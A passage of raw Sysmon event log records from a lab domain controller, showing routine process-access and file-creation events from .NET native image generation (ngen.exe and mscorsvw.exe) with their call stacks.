32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5104-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.273{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5104-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.273{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5104-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:07.226{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ca0-0\System.Net.Http.WebRequest.dll2021-01-18 13:51:07.226 10341000x80000000000000008593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.179{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.163{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.163{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.132{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-4F04-00000000A301}3004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.117{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-4F04-00000000A301}3004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:07.117{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-4F04-00000000A301}3004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:07.038{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\121c-0\System.Net.dll2021-01-18 13:51:07.038 10341000x80000000000000008628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.867{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.867{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.804{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5904-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.788{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5904-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.788{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5904-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:08.726{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b38-0\System.Runtime.Caching.dll2021-01-18 13:51:08.726 10341000x80000000000000008621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.585{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.570{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.570{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.538{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5704-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.523{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5704-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.523{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5704-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:08.460{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b8c-0\System.Reflection.Context.dll2021-01-18 13:51:08.460 10341000x80000000000000008614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.351{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 